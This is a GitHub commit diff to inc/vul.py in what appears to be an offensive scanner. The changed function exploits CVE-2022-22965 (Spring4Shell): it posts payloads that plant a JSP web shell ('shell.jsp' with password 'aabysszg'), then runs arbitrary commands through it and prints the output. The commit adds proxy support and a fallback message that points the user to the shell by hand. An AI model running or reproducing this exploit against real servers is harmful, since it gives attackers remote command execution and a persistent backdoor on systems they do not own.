Skip to content

Commit 6e2b4b6

Browse files
authored
Update vul.py
1 parent 1bea924 commit 6e2b4b6

File tree

1 file changed

+8
-5
lines changed

1 file changed

+8
-5
lines changed

inc/vul.py

Lines changed: 8 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -41,15 +41,14 @@ def CVE_2022_22965(url, proxies):
4141
getpayload = url + payload_http
4242
try:
4343
requests.packages.urllib3.disable_warnings()
44-
requests.post(url, headers=Headers_2, data=file_date_data, verify=False)
44+
requests.post(url, headers=Headers_2, data=file_date_data, verify=False, proxies=proxies)
4545
requests.post(url, headers=Headers_2, data=payload_other, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4646
requests.post(url, headers=Headers_1, data=payload_linux, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4747
sleep(0.5)
4848
requests.post(url, headers=Headers_1, data=payload_win, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
4949
sleep(0.5)
5050
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
5151
sleep(0.5)
52-
requests.get(url, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
5352
test = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
5453
test_again = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
5554
if (test.status_code == 500) or (test_again.status_code == 200):
@@ -61,9 +60,13 @@ def CVE_2022_22965(url, proxies):
6160
url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}".format(Cmd)
6261
r = requests.get(url_shell, verify=False, proxies=proxies)
6362
r_again = requests.get(url_shell, verify=False, proxies=proxies)
64-
resp = r_again.text
65-
result = re.findall('([^\x00]+)\n', resp)[0]
66-
cprint(result ,"green")
63+
if r_again.status_code == 500:
64+
cprint("[-] 重发包返回状态码500,请手动尝试利用WebShell:shell.jsp?pwd=aabysszg&cmd=whoami\n","yellow")
65+
break
66+
else:
67+
resp = r_again.text
68+
result = re.findall('([^\x00]+)\n', resp)[0]
69+
cprint(result ,"green")
6770
else:
6871
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/shell.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
6972
except KeyboardInterrupt:

0 commit comments

Comments
 (0)